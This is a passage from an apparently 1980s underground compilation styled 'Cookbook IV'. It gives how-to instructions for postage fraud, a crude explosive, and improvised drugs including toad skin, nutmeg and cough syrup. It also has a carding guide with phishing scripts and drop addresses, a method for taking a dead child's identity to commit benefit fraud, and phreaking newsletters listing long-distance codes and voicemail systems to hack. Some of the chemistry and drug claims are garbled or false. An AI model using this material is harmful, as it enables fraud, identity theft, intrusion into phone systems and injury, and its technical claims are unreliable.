the inside of your suit.  Next, go swimming with your friend!  
Then open the bags and look like you're enjoying a piss.  And anyone
there will turn a deep red!  They will be embarrased so much,
Especially if they have guests there! Explain what it is, then add
vinegar to the pool.  Only a little.  The "piss" disappears.

HAHA!!          --------------Exodus------------



Free Postage                                    by the Jolly Roger

The increasing cost of postage to mail letters and packages is
bringing down our standard of living.  To remedy this deplorable
situation, some counter control measures can be applied.
For example, if the stamps on a letter are coated with Elmer's
Glue by the sender, the cancellation mark will not destroy the stamp:
the Elmer/s drives to form an almost invisible coating that protects
the stamps from the cancellation ink. Later, the receiver of the
letter can remove the cancellation mark with water and reuse the
stamps. Furthermore, ecological saving will also result from recycling
the stamps.  Help save a tree.
The glue is most efficently applied with a brush with stiff,
short bristles.  Just dip the brush directly into the glue and spread
it on evenly, covering the entire surface of the stamp.  It will dry
in about 15 minutes.
For mailing packages, just follow the same procedure as outlined
above; however, the package should be weighed and checked to make sure
that it has the correct amount of postage on it before it is taken to
the Post Office.
Removing the cancellation and the glue from the stamps can be
easily accomplished by soaking the stamps in warm water until they
float free from the paper.  The stamps can then be put onto a paper
towel to dry.  Processing stamps in large batches saves time too.
Also, it may be helpful to write the word 'Elmer' at the top of the
letter (not on the envelope) to cue the receiving party in that the
stamps have been protected with the glue.
We all know that mailing packages can be expensive.  And we also
know that the handicapped are sometimes discriminated against in jobs.
The Government, being the generous people they are, have given the
blind free postal service.
Simply address you envelope as usual, and make one modification.
In the corner where the stamp would go, write in (or stamp) the words
'FREE MATTER FOR THE BLIND".  Then drop you package or letter in one
of the blue fedral mailboxes.  DO NOT TAKE THE LETTER TO THE POST
OFFICE, OR LEAVE IT IN YOUR MAILBOX.
Sounds very nice of the government to do this, right?  Well, they
aren't that nice.  The parcel is sent library rate, that is below
third class.  It may take four to five days to send a letter to just
the next town.
This too is quite simple, but less effective.  Put the address
that you are sending the letter to as the return address.  If you were
sending a $20 donation to the pirate's Chest, you would put our
address (po box 644, lincoln ma. 01773) as the return address.
Then you would have to be carless and forget to put the stamp on
the envelope.  A nice touch is to put a bullshit address in the center
of the envelope.
Again, you MUST drop the letter in a FEDRAL mailbox.  If the post
office doesn't send the letter to the return address for having no
stamp, they will send it back for the reason of "No such address".
Example--

Pirates Chest  Dept. 40DD
P.O. Box 644865
Lincol, Ma. 41773

                 Tom Bullshit
                 20 Fake Road
                 What Ever, XX     99851

One last thing you might try doing is soaking a cancelled stamp
off of an envelope, and gluing it onto one you are sending.  Then burn
the stamp, leaveing a little bit to show that there was one there.

                                     --Exodus


Unstable Explosives                             by the Jolly Roger

Mix solid Nitric Iodine with househould ammonia. Wait overnight and
then pour off the liquid. You will be left with a muddy substance. Let
this dry till it hardens.  Now throw it at something!!!!

                                ------------Exodus-----------


Weird Drugs                                     by the Jolly Roger

Bananas:
1. Obtain 15 pounds of ripe yellow bananas
2. Peel all and eat the fruit. Save the peelings
3. Scrape all the insides of the peels with a sharp knife.
4. Put all the scraped material in a large pot and add water.
5. Boil 3 or 4 hours until it has attained a solid paste considtency.
6. Spread paste onto cookie sheets and dry in ofen for about 20
   minutes. This will result in fine black powder. Usually one will
   feel the effects after smoking three to four cigarettes.

Cough syrup:
mix robitussion a-c with an equal amount of ginger ale and drink. The
effect are sedation and euphoria. Never underestimate the effects of
any drug! You can od on cough syrup!

Toads:
1. Collect five to ten toads, frogs will not work. The best kind are
   tree toads.
2. Kill them as painlessly as possible, and skin immediately.
3. Allow the skins to dry in a refrigerator four four to five days, or
   until the skins are brittle.
4. Now crush the skins into powder and smoke. Due to its bad taste you
   can mix it with a more fragrent smoking medium.

Nutmeg:
1. Take several whole nutmegs and grind them up in an old grinder.
2. After the nutmegs are ground. Place in a mortar and pulverize with
   a pestle.
3. The usual dosage is about 10 or 15 grams. A larger dose may
   produce excessive thirst,anxiety,and rapid hart beat, but
   hallucinations are rare.

Peanuts:
1. Take 1 pound of raw peanuts (not roasted)
2. Shell them, saving the skins and discarding the shells.
3. Eat the nuts.
4. Grind up the skins and smoke them.

                                    -------Exodus-------


The Art of Carding                              by the Jolly Roger

Obtaining a credit card number: There are many ways to obtain the
information needed to card something.
The most important things needed are the card number and the expiration
date.  Having the card-holders name doesn't hurt, but it is not essential.
The absolute best way to obtain all the information needed is by trashing.
The way this is done is simple.  You walk around your area or any other
area and find a store, mall, supermarket, etc., that throws their
garbage outside on the sidewalk or dumpster.  Rip the bag open and see
if you can find any carbons at all.  If you find little shreds of
credit card carbons, then it is most likely not worth your time to tape
together.  Find a store that does not rip their carbons at all or only in half.
Another way is to bullshit the number out of someone.  That is call them
up and say "Hello, this is Visa security and we have a report that
your card was stolen." They will deny it and you will try to get it out
of them from that point on.  You could say, "It wasn't stolen?  Well what
is the expiration date and maybe we can fix the problem....
Ok and what is the number on your card?......Thank you very much and
have a nice day."  Or think of something to that degree. 
Another way to get card numbers is through systems such as TRW and CBI,
this is the hard way, and probably not worth the trouble, unless you are
an expert on the system.  Using credit card numbers posted on BBS's is
risky.  The only advantage is that there is a good chance that other
people will use it, thus decreasing the chances of being the
sole-offender.  The last method of getting numbers is very good also.
In most video rental stores, they take down your credit card number
when you join to back-up your rentals.  So if you could manage to steal
the list or make a copy of it, then you are set for a LONG time.
Choosing a victim: Once you have the card number, it is time to make the
order.  The type of places that are easiest to victimize are small
businesses that do mail order or even local stores that deliver.
If you have an ad for a place with something you want and the order number
is NOT a 1-800 number then chances are better that you will succeed.
Ordering: When you call the place up to make the order, you must have
several things readily at hand.  
These are the things you will need: A name, telephone number, business
phone, card number (4 digit bank code if the card is MasterCard),
expiration date, and a complete shipping and billing address.
I will talk about all of these in detail.  A personal tip: When I call
to make an order, it usually goes much smoother if the person you are
talking to is a woman.  In many cases they are more gullible than men.
The name:  You could use the name on the card or the name of the person
who you are going to send the merchandise to.  Or you could use the name
on the card and have it shipped to the person who lives at the drop
(Say it is a gift or something). 
The name is really not that important because when the company verifies
the card, the persons name is never mentioned, EXCEPT when you have a
Preffered Visa card.  Then the name is mentioned.  You can tell if you
have a Preffered Visa card by the PV to the right of the expiration
date on the carbon. Nophone all day long waiting for the company to call
(Which they will), then the phone number to give them as your home-phone
could be one of the following: A number that is ALWAYS busy, a number
that ALWAYS rings, a payphone number, low end of a loop (and you will wait
on the other end), or a popular BBS.
NEVER give them your home phone because they will find out as soon as
the investigation starts who the phone belongs to.  The best thing would
be to have a payphone call forward your house
(via Cosm The business number:  When asked for, repeat the number you
used for your home phone.
Card number: The cards you will use will be Visa, Mastercard, and
American Express.  The best is by far Visa.  It is the most
straight-forward.  Mastercard is pretty cool except for the bank code.
When they ask for the bank code, they sometimes also ask for the bank
that issued it.  When they ask that just say the biggest bank you know of
in your area.  Try to avoid American Express.  They tend to lead full
scale investigations.  Unfortunately, American Express is the most popular
card out.   When telling the person who is taking your call the card
number, say it slow, clear, and with confidence.
e.g. CC# is 5217-1234-5678-9012.  Pause after each set of four so you
don't have to repeat it.
Expiration date: The date must be at LEAST in that month.  It is best
to with more than three months to go.
The address: More commonly referred to as the 'drop'.  Well the drop
can range from an abandoned building to your next door neighbors
apartment.  If you plan to send it to an apartment building then be
sure NOT to include an apartment number.  This will confuse UPS or postage
men a little and they will leave the package in the lobby. 
Here is a list of various drops: The house next door whose family is on
vacation, the apartment that was just moved out of, the old church that
will be knocked down in six months, your friends house who has absolutely
nothing to do with the type of merchandise you will buy and who will
also not crack under heat from feds, etc..
There are also services that hold merchandise for you, but personally
I would not trust them.  And forget about P.O. Boxes because you need
ID to get one and most places don't ship to them anyway.
Other aspects of carding:Verifying cards, seeing if they were reported
stolen.
Verifying cards: Stores need to verify credit cards when someone purchases
something with one.  They call up a service that checks to see if the
customer has the money in the bank.
The merchant identifies himself with a merchant number.  The service
then holds the money that the merchant verified on reserve.  When the
merchant sends in the credit card form, the service sends the merchant
the money.  The service holds the money for three days and if no form
appears then it is put back into the bank.  The point is that if you
want to verify something then you should verify it for a little amount
and odds are that there will be more in the bank.
The good thing about verification is that if the card doesn't exist or
if it is stolen then the service will tell you.  To verify MasterCard
and Visa try this number.  It is voice:1-800-327-1111 merchant code is
596719.
Stolen cards: Mastercard and Visa come out with a small catalog every
week where they publish EVERY stolen or fraudulantly used card.
I get this every week by trashing the same place on the same day. 
If you ever find it trashing then try to get it every week.
Identifying cards: Visa card numbers begin with a 4 and have either 13
or 16 digits.  MasterCard card numbers begin with a 5 and have 16 digits.
American Express begins with a 3 and has 15 digits.  They all have the
formats of the following:
3xxx-xxxxxx-xxxxx   American Express
4xxx-xxx-xxx-xxx    Visa
4xxx-xxxx-xxxx-xxxx Visa
5xxx-xxxx-xxxx-xxxx MasterCard
Gold cards: A gold card simply means that credit is good for $5000. 
Without a gold card, credit would be normally $2000. 
To recognize a gold card on a carbon there are several techniques:
American Express-none.
Visa-PV instead of CV.
Note-When verifying a PV Visa, you have to have the real name of the
cardholder.
Mastercard-An asterix can signify a gold card, but this changes depending
when the card was issued.
I am going to type out a dialog between a carder and the phone operator
to help you get the idea.
Operator: "Over-priced Computer Goods, may I help you?"
Carder:   "Hi, I would like to place an order please."
Operator: "Sure, what would you like to order?"
Carder:   "400 generic disks and a double density drive."
Operator: "Ok, is there anything else?"
Carder:   "No thank you, that's all for today."
Operator: "Ok, how would you like to pay for this?  MasterCard or Visa?"
Carder:   "Visa."
Operator: "And your name is?"
Carder:   "Lenny Lipshitz." (Name on card)
Operator: "And your Visa card number is?"
Carder:   "4240-419-001-340" (Invalid card)
Operator: "Expiration date?"
Carder:   "06-92."
Operator: "And where would you like the package shipped to?"
Carder:   "6732 Goatsgate Port.  Paris,texas,010166."
Operator: "And what is your home telephone number?"
Carder:   "212-724-9970" (This number is actually always busy)
Operator: "I will also need your business phone number in case we have
to reach you."
Carder:   "You can reach me at the same number. 212-724-9970"
Operator: "O.K. Thank you very much and have nice day."
Carder:   "Excuse me, when will the package arrive?"
Operator: "In six to seven days UPS."
Carder:   "Thanks alot, and have a pleasant day."
Now you wait 6-7 days when the package will arrive to the address which
is really a house up for sale.  There will be a note on the door
saying, "Hello UPS, please leave all packages for Lenny Lipshitz in the
lobby or porch.  Thanks alot, Lenny Lipshitz" (Make the signature half-way
convincing)

Still as DANGEROUS as ever.............   ExodusRecognizing credit cards                        by the Jolly Roger

  [Sample: American Express]
      XXXX XXXXXX XXXXX
      MM/Y1 THRU MM/Y2       Y1
      John Doe               AX

Explanation:
The first date is the date the person got the card, the second
date is the expriation date, after the expiration date is the same
digits in the first year.The American Express Gold has many more
numbers (I think 6 8 then 8). If you do find a Gold card keep it
for it has a $5000.00 backup even when the guy has no money!

[Sample: Master Card]
   5XXX XXXX XXXX XXXX
   XXXX AAA DD-MM-YY MM/YY
   John Doe.

Explanation:
The format varies, I have never seen a card that did not start with
a 5XXX there is another 4 digits on the next line that is sometimes
asked for when ordering stuff, (and rarely a 3 digit letter combo
(e. ANB). The first date is the date the person got the card
and the second date is the expiration date.
Master Card is almost always accepted at stores.
[Sample: VISA]
   XXXX XXX(X) XXX(X) XXX(X)
   MM/YY    MM/YY*VISA
   John Doe

Explanation:
Visa is the most straight forward
of the cards,for it has the name right on the card itself, again the
first date is the date he got the card and the second is the
expiration date. (Sometimes the first date is left out). The
numbers can eather be 4 3 3 3 or 4 4 4 4. Visa is also almost always
accepted at stores, therefore, the best of cards to use.

How To Create A New Indentity                    By The Walking Glitch
                     Courtesy of the Jolly Roger!
             
You might be saying, "Hey Glitch, what do I need a new identity for?"
The answer is simple. You might want to go buy liquor somewhere, right?
You might want to go give the cops the false name when you get busted
so you keep your good name, eh?  You might even want to use the new
identity for getting a P.O. Box for carding. Sure! You might even
want the stuff for renting yourself a VCR at some dickless loser of a
convenience store. Here we go:
Getting a new ID isn't always easy, no one said it would be. By following
these steps, any bozo can become a new bozo in a coupla weeks.

STEP 1

The first step is to find out who exactly you'll become. The
most secure way is to use someone's ID who doesn't use it themselves.
The people who fit that bill the best are dead. As an added bonus they
don't go complaining one bit. Go to the library and look
through old death notices. You have to find someone who was born about
the same time as you were, or better yet, a year or two older
so you can buy booze, etc. You should go back as far as you can for the
death because most states now cross index deaths to births so people
can't do this in the future. The cutoff date in Wisconsin is 1979, folks
in this grand state gotta look in 1978 or earlier. Anything earier there
is cool. Now, this is the hardest part if you're younger. Brats that
young happen to be quite resilient, takin' falls out of three story windows
and eating rat poison like its Easter candy, and not a scratch or
dent. There ain't many that die, so ya gotta look your ass off. Go
down to the library and look up all the death notices you can,
if it's on microfilm so much the better. You might have to go through
months of death notices though, but the results are well worth it.
You gotta get someone who died locally in most instances: the death
certificate is filed only in the county of death. Now you go down to
the county courthouse in the county where he died and get the
death certificate, this will cost you around $3-$5 depending on the state
you're in. Look at this hunk of paper, it could be your way to
vanish in a clould of smoke when the right time comes, like right after
that big scam. If You're lucky, the slobs parents signed him up with
social security when he was a snot nosed brat. That'll be another piece
of ID you can get. If not, thats ok too. It'll be listed on the death
certificate if he has one. If you're lucky, the stiff was born
locally and you can get his birth certificate right away.

STEP 2

Now check the place of birth on the death certificate, if it's in
the same place you standing now you're all set. If not, you can mail
away for one from that county but its a minor pain and it might 
take a while to get, the librarian at the desk has listings of where
to write for this stuff and exactly how much it costs. Get the Birth
cirtificate, its worth the extra money to get it certified
because thats the only way some people will accept it for ID. When yur
gettin this stuff the little forms ask for the reason you want it,
instead of writing in "Fuck you", try putting in the word "Geneology".
They get this all the time.  If the Death certificate looks good for
you, wait a day or so before getting the certified birth certificate
in case they recognize someone wanting it for a dead guy.

STEP 3

Now your cookin! You got your start and the next part's easy.
Crank out your old Dot matrix printer and run off some mailing labels
addressed to you at some phony address. Take the time to check your
phony address that there is such a place. Hotels that rent by the month
or large apartment buildings are good, be sure to get the right zip
code for the area. These are things that the cops might notice that
will trip you up.  Grab some old junk mail and paste your new lables
on them. Now take them along with the birth certificate down to the library.
Get a new library card. If they ask you if you had one before say that
you really aren't sure because your family moved around alot when
you were a kid. Most libraries will allow you to use letters as a form
of ID when you get your card. If they want more give them a sob story
about how you were mugged and got your wallet stolen with all your
identification. Your card should be waiting for you in about two weeks.
Most libraries ask for two forms of ID, one can be your trusty Birth
Certificate, and they do allow letters addressed to you as a second
form.

STEP 4
    
Now you got a start, it isn't perfect yet, so let's continue. You should
have two forms of ID now. Throw away the old letters, or better yet
stuff them inside the wallet you intend to use with this stuff.
Go to the county courthouse and show them what nice ID you got and get
a state ID card. Now you got a picture ID. This will take about two weeks
and cost about $5, its well worth it.

STEP 5

If the death certificate had a social security number on it you can go
out and buy one of those metal SS# cards that they sell.
If it didn't, then you got all kinds of pretty ID that shows exactly
who you are. If you don't yet have an SS#, Go down and apply for one,
these are free but they could take five or six weeks to get,
Bureaucrats you know... You can invent a SS# too if ya like, but the motto
of 'THE WALKING GLITCH' has always been "Why not excellence?".

STEP 6

If you want to go whole hog you can now get a bank account in your new
name.  If you plan to do alot of traveling then you can put alot
of money in the account and then say you lost the account book.  After 
you get the new book you take out all the cash. They'll hit you
with a slight charge and maybe tie-up your money some, but if you're
ever broke in some small town that bank book will keep you from being
thrown in jail as a vagrant.

ALL DONE?

So kiddies, you got ID for buying booze, but what else? In some towns
(the larger the more likely) the cops if they catch you for something
petty like shoplifting stuff under a certain dollar amount, will just
give you a ticket, same thing for pissing in the street. Thats it!
No fingerprints or nothing, just pay the fine (almost always over $100)
or appear in court.  Of course they run a radio check on your ID, you'll
be clean and your alter-ego gets a blot on his record.
Your free and clear.  Thats worth the price of the trouble you've gone
through right there.  If your smart, you'll toss that ID away if this
happens, or better yet, tear off your picture and give the ID to someone
you don't like, maybe they'll get busted with it.
If you're a working stiff, here's a way to stretch your dollar. Go to work
for as long as it takes to get unemployment and then get yourself fired.
Go to work under the other name while your getting the unemployment.
With a couple of sets of ID, you can live like a king.  These concepts
for survival in the new age come to you compliments of THE WALKING GLITCH.
First release of this phile 7/7/88.

                      brought to you in the Cookbook IV courtesy of...
                                       --------------Exodus-------------
##########################################################################
#                                                                        #
#                           The Remote Informer                          #
#                                                                        #
#------------------------------------------------------------------------#
#                                                                        #
#              Editors: Tracker, Norman Bates, and Ye Cap'n              #
#                                                                        #
#========================================================================#
# September 26, 1987                                           Issue: 02 #
#========================================================================#
##########################################################################
#                                                                        #
#   Brought to you by the 'new' TUFF:  The Underground Fone Federation   #
#                                                                        #
##########################################################################
==========================================================================
                                 The News                                 
==========================================================================
     Sprint Strikes Back      |    Celestial Elite/TUFF Come to an End    
==============================|===========================================
   Sprint caught a guy dealing|   Celestial  Elite  and  TUFF, the  famous
codes  on  the  street  in  LA|hack/phreak groups came to an end  a couple
this  past  week.  Information|weeks ago.  TUFF, however, is being  reborn
on  this  bust  is limited  at|and you can  expect it to  be back  to full
this time.                    |force within a month.  Sources have it that
   A seventeen  year  old  was|Magnus Adept, head  of the  now  terminated
busted  in Arizona  last week.|group, Celestial  Elite, has  started a new
The name of the  teenager will|group called Avalon Kingdom.  We are unsure
not be printed to  protect him|what plans are in store for it.            
from harassment calls.        |   TUFF has  several ideas  and  plans that
                              |will be out to the  public soon.  Look  for
>This information was supplied|future  issues  of The Remote Informer (tm)
     by Phreaky Phone II      |for new updates.                   
       
==========================================================================
        Beige Box Bust        |   TeleNet Hacker   |  Bate's Motel Moves  
==============================|====================|======================
   One  of our  editors and  a|   Crusader released|   Bate's  Motel  BBS,
member of  TUFF, Norman  Bates|his  TeleNet hacking|run  by  Norman Bates,
was  caught  for  Beige boxing|program on September|was forced to move. It
that he had done over 3 months|20, 1987.  Look  for|is temporarily  set up
ago.  The  calls  he had  made|it on a  good  board|at  (619)267-8619.  It
were inside his state and cost|you  call.  A review|will remain 1200 baud,
a total  of $12.  He  paid the|will be in the  next|and a  member  of  the
bill and no charges were filed|issue of The Remote |TUFF  Network.  It  is
against him.                  |Informer.           |open to the public.   
==========================================================================
   Phreaky Phones Return: Amazing?   | LDDS Buys Out TMC: Companies Merge 
=====================================|====================================
   The original Phreaky Phone numbers|   LDDS bought  out TMC last  month.
now support  the new  Phreaky Phones.|They merged into  LDDS, since it was
The guys running  them  had protested|bigger  and   more  widespread.  Any
that the  lines were being monitored.|companies that  were  subscribing to
There is no way that could have been,|the  TMC  long distance service were
and  they contradicted  themselves by|automatically coverted to LDDS.  All
restarting Phreaky Phones on the same|local TMC ports still work, but will
numbers.  They  gave  alot of  credit|soon be disconnected.  Refer  to the
to the people calling to suggest they|article  on  LDDS  in this issue for
believe a story like that.           |more  information on LDDS  dial-ups.
==========================================================================
   US Sprint Calls Destinations  |  Pirate's Hollow Is Back With 10 Megs  
==========================================================================
   US Sprint  now  calls  all the|   Pirate's Hollow is  back on-line.  It
numbers called  with unauthorized|now is run a  10 meg hard drive.  Unlike
codes.   Their  dis-advantage  is|most boards that have #'s  of megs, this
that  they are  delayed by  about|one will stress more  attention  on it's
two  months  in  calling  because|database.  The  database is scheduled to
they  have to  wait  till  people|be online by October 1st. This database
report they did not make calls to|will  contain 800+ text files on various
the numbers they were billed for.|topics, with  about 60% - 70% pertaining
Best advice is  to not call voice|to  illegal  activities.  Unfortunately,
with Sprint  except to  those who|Trax Xe is being redesigned, so until it
have   private  lines  other than|is finished, it will run on Carina.  The
their regular phone line.        |number is (415)593-6784 (300/1200 baud).
==========================================================================
                           Raggers and Braggers                           
==========================================================================
   This section is to make  you aware  of well-known raggers and braggers.
Since this is  the first time this  section is being printed, we will tell
you what classifies people as raggers and braggers.  In  the future issues
the top raggers and braggers will be  listed in this newsletter to let the
SysOps  know who not to let on their board, or to  atleast keep an eye on.
   A ragger is someone who will put someone else  down for something.  The
person might post a message  asking a novice  question  about hacking  and
phreaking, or may  say  something  that is completely wrong, and a  ragger
will  put the  other person  down for he said, posted, etc.  The ones that
usually classify in this category are the ones that think they know it all
and consider themselves right  no matter  what anyone  says.  Most  of the
users that  use codes and  consider  themselves a  master phreaker usually
become raggers.                                                         
   A bragger is someone who either does or thinks he does know everything,
and puts it upon himself to tell  the  whole  world that he  knows it all.
This  person is also  one who thinks he is better  than  everyone else and
he believes he is Elite, and no one else is.  People  who tend to  do this
are those who have, for some reason, become well-known in the  underworld,
and as  a result become a bragger.  Those  usually not too well-known will
not tend  to brag as  much as  those who think  everyone would  love to be
their friend and be like them.                         
   As a well-known ragger and  bragger, The Toad, learned that it does not
help to be one or both of those.  He  has since  changed and is now easily
accepted by  most.  Most people  disliked him because others they knew had
said something bad about him.  This  is called peer pressure and  is a bad
influence to those who  are new to the underworld.  I would suggest in the
future,  to not judge someone by what others  say, but rather by  how they
act around/to you. 
   The current  most  popular Atarian  that  classifies as a  ragger and a
bragger is Ace of Aces, and  is well-hated by many users and SysOps, since
he tends to put  down anything anyone  says and considers himself the best
at writing hacking programs.  He is commonly  referred to as  Ass of Asses
and Ass of Assholes.  Even holding an open  mind about this guy, you would
soon come to find that what others said  coincides  with what you see from
him.                                                                      
==========================================================================
                          A New 950 has arrived!                          
==========================================================================
   LDDS, who as  mentioned above bought out TMC, is  installing  a new 950
port to most major  cities.  By the time  you read  this, it should  be in
almost every area that supports 950 ports.  The number is  950-1450.  This
port will dial 976 numbers, but not 700, 800, or 900 numbers.  The dialing
method  for LDDS is:  7 digit code, then  even if the code is  bad it will
give you a dial tone.  Then  dial the area  code  plus the number.  If you
have a bad code it will simply say your call cannot be completed as it was
dialed.  There is a default code used on the system that  currently works.
The code is simply, 1234567.  I have seen codes from 5 different companies
and they all are in the format of 00xxxxx.  I do  not  know  what  type of
software they use, but I  will  know by  the next  issue exactly what they
place  on  the bills.  This  could  be  the  answer  to  alot  of people's
problems with fear of Sprint and ITT, especially  AllNets.  Just remember,
Tracker  is the one  who  found  this, and all  information  about it.  If
someone  is seen saying  they found  this, then they will be listed in the
next issue which will contain an article on leeches.                      
==========================================================================
                             Mailbox Systems                              
==========================================================================
   Mailbox systems are the link between information and the underworld. If
you have ever called one, then you will know the advantages of having one,
especially the ones that are  open to whole underworld, rather than just a
select few.  There are two types  of mailbox systems that are widely used.
   The first  type we will  talk about is the multiple mailbox systems, or
commonly referred to  as  message  systems.  These  systems  have several
mailboxes set up on one number.  Usually, you  can access other  mailboxes
from that  number  by  pressing '*' or '#'.  Sometimes you  just enter the
mailbox number and you are connected.  These are the safest systems to use
to protect information from US Sprint and other  long distance  companies.
Since US Sprint and other companies  call  the destination  numbers, it is
safer to  have 800 mailbox systems, and  most  of  the time, the  multiple
mailbox systems  are on 800 numbers.  The  passcode on  these  systems can
vary in length and can be accessed by several  different methods, so it is
impossible to explain exactly how to hack these systems.                  
   The other type is the single mailbox system.  These  are usually set up
in a reserved  prefix in an area  code.  (Ex: 713-684-6xxx)  These systems
are usually  controlled by the  same type of hardware/software.  To access
the area  where you  enter the  passcode, just hit '0' for a second or so.
The passcodes are  four (4)  digits  long.  The only way to hack  these is
manually.  The best thing you could do is to  find one that does not  have
a recording from a person, but just the  digitized voice.  If you hack one
that  someone already  owns, they will  report it and  it will not last as
long.                                                                     
   Here is a list mailboxes or prefixes to help you get started       
--------------------------------------------------------------------------
   Single                          Multiple                        Digits 
------------                     ------------                     --------
213-281-8xxx                     212-714-2770                         3   
213-285-8xxx                     216-586-5000                         4   
213-515-2xxx                     415-338-7000 Aspen Message System    3   
214-733-5xxx                     714-474-2033 Western Digital             
214-855-6xxx                     800-222-0651 Vincent and Elkins      4   
214-978-2xxx                     800-233-8488                         3   
215-949-2xxx                     800-447-8477 Fairylink               7   
312-450-8xxx                     800-521-5344                         3   
313-768-1xxx                     800-524-2133 RCA                     4   
405-557-8xxx                     800-527-0027 TTE TeleMessager        6   
602-230-4xxx                     800-632-7777 Asynk                   6   
619-492-8xxx                     800-645-7778 SoftCell Computers      4   
713-684-6xxx                     800-648-9675 Zoykon                  4   
                                 800-847-0003 Communications World    3   
==========================================================================
                           The Disclaimer!                            
==========================================================================
   We, the editors, take no  responsibility  for  your actions and  use of
the information in this newsletter.  This newsletter is for  informational
purposes  only.  If  you   are  easily   offended   by   telecommunication
discussions, then we suggest  that you not read  this newsletter.  But for
those  who are  truely interested in the  information in this  newsletter,
enjoy it.                                                                 
==========================================================================
                         Coming in the next issue!                        
==========================================================================
   In the next issue, we  will  be open  for suggestions from  the readers
of this issue.  We will have some featured articles though, which include:
1) Study of bridges
2) Review of Crusader's new TeleNet Hacker
3) More information on the new LDDS 950 port
4) Review of Code Hackers for all modems
5) List of TeleNet addresses
6) Credit Card checkers
7) Ideas from the readers
==========================================================================

      Brought to you in Cookbook IV by EXODUS!!!!!!!!!!!!!!!


##############################################################################
#                      _________________________________                     #
#                       /he Remote Informer Newsletter!                      #
#                                                                            #
#----------------------------------------------------------------------------#
# November                                                     TRI Issue: 03 #
#----------------------------------------------------------------------------#
#                                                                            #
#     The Editors:  Tracker, Ye Cap'n, Norman Bates, and The Reporter        #
#                                                                            #
##############################################################################
==============================================================================
=                            Introduction                                    =
==============================================================================
It's been a month now, and ALOT has happened.  So much, in fact, that the
information will be split into several issues.  This should be no shock since
I mentioned in the first issue that we may put several issues out sometimes.
     I want to congratulate the readers for finally contributing to the
newsletter.  This first two issues were all on information that I, myself,
obtained.  Several people gave me information for these issues, and their
handle and information is included in the articles.
==============================================================================
=                                 In The News!                               =
==============================================================================
     ITT has 9 digits!     |       Phreaky Phones Go Down!       |Information!
==============================================================================
   For those of you who did|   The famed Phreaky Phones  are down|   We   have
not know this, ITT has nine|again. Modem Man, the original person|so much info
digit codes.  They are said|that started them, has said that they|to put  out,
to give  better connections|will be down until further notice. In|that  we are
to some extent.  This info.|the meantime, other independent boxes|putting  out
was  originally given to us|are being started.   A listing can be|many  issues
by Party Beast.            |made of current ones on request.     |at one time.
=================================================================|If you  want
  Magnus Adept Gets Busted  |    Sprint Codes Are Dying Fast!    |all   issues
=================================================================|that are out
   Fellow Atarian  and well-|   Sprint codes  are hard to get and|now,    then
known  phreak  Magnus  Adept|when they are obtained, they tend to|call  one of
got caught  by MCI.  Details|die rather  quickly.  Phreakers have|the   boards
of the  how, when, and where|been  saying that  the 950-0777 port|at  the  end
are not known at  this time.|is dead, but  on the contrary, it is|of the issue
He got caught with 150 codes|still  available in states  that are|or look  for
and  may  have to pay  up to|not highly  abused by phreaks.  Here|an editor on
50 dollars  for  each  code.|again, rumors are being spread.     |a hack  BBS.
==============================================================================
=                          The Best BBS of the Month                         =
==============================================================================
     Starting from now on, we will have a BBS of the month.  We will choose a
BBS, ragardless of computer type, and look at the user participation in phreak
related matters, as well as quality discussions on the various illegal topics.
A BBS can remain the BBS of the month as long as they reside above the rest of
the BBS systems.  Even though we will sometimes bring out more than one issue
in a month, the board will remain BBS of the month until the first issue inthe
next month comes out.
     This month's BBS of the month is FBI PirateNet.  We chose this board
because of the large numbers of posts in the bases, and not only information,
but discussions as well, with a minimum number of posts from raggers and
braggers.  The number for it is 516-661-7360.  The SysOp of FBI PirateNet is
The Phantom, not to be confused with an earlier narc.
==============================================================================
=           US Sprint Expected to Trim Staff, Consolidate Divisions          =
==============================================================================
     New York -- US Sprint Communications Corp., the troubled long distance
carrier, is expected to announce soon that it will cut its work force by
several hundred people and reduce its seven regional divisions to 3 operating
groups, sources familiar with the company said.
     The company's Pacific division is based in Burlingame, CA.  The layoffs
and reorganization are part of a plan by US Sprint's new president, Robert H.
Snedaker, to reduce heavy operating losses, which analysts expect to reach
more than $800 million this year.
     Snedaker replaced Charles M. Slibo, who was forced to resign in July
because losses were running much higher than the parent companies had
expected.  Problems with the company's computerized billing system also
contributed to Skibo's ouster.  US Sprint is owned and operated by the GTE
Corp. and United TeleCom.
     According to sources close to Snedaker, who was vice chairman and chief
operating officer of United TeleCom, he is planning to consolidate the
company's 7 divisions, which operate in the same geographical regions as the
seven regional Bell operating companies, into 3 divisions.
     The rationale for the move, according to idustry analysts, is that the
company will need a much smaller work force once it begins handling all it's
phone traffic on it's new fiber optic network, which can carry a greater
number of telephone calls at less cost.  Company officials have said that
they expect to have most of the traffic on the network by early next year.
     One source said that there would be more than one round of layoffs in the
coming months and that the company ultimately plans to reduce its 14,000
member work force by 15 percent.
     Several top managers are expected to resign as soon as US Sprint
centralizes its marketing and support operations as its headquarters in Kansas
City, MO., according to a report in the latest issue of Business Week
magazine.
     A spokesman for US Sprint said on Friday that the company would not
comment on the rumors.  The company is the nation's third largest long
distance company, after the American Telephone and Telegraph Co. (AT&T) and
MCI Communications Co.
     Last year, Washington based MCI undertook a similar reorganization in
which it posted a $502.5 million loss to write down old inventory and
restructure operations.
     Analysts said that is US Sprint is to turn a profit, the company must
increase its market share.  "To do this, US Sprint must gain more large
business customers, which account for about 80 percent of industry revenues,"
said Robert B. Morris III, Securities in San Francisco.
     Morris said that by using a slick marketing campaign to differentiate its
all-fiber telephone network from those of competitors, US Sprint more than
doubled its customer base last year.  But "most of these customers were
residential and small business users that added little to Sprint's bottom
line," he added.  "If the company expects to be profitable, it will have to
concentrate on providing the best service to volume users."
] This information was supplied by Ye Cap'n
==============================================================================
=             Secret Service Cracks Down on Teen Hackers                     =
==============================================================================
     Mount Lebanon, PA -- The US Secret Service and local police departments
have put a scare into the hacker community with a nationwide crackdown on
computer crime that has resulted in the arrests of teenage hackers in at least
three cities.
     "People who monitor the bulletin boards say there are a lot of nervous
hackers out there, wondering who will be arrested next," says Ronald E.
Freedman, vice-president of Advanced Information Management, a Woodbridge, VA
base computer security firm.
     Nine teenagers from Mount Lebanon Junior-Senior High School near
Pittsburg, PA, were arrested recently and charged with computer fraud.  The
juveniles allegedly used home computers to gain illegal access to a credit
card authorization center.  They obtained valid credit card numbers and used
them to purchase thousands of dollars worth of mail order merchandise, the
police said.
     Freedman says it appears the hackers used some relatively sophisticated
techniques in the scheme, including specially written software that enabled
them to bypass security controls and navigate through credit records to obtain
key information.
     Police officials say that the hackers also obtained access codes from
pirate bulletin board systems to make free long distance calls and gain access
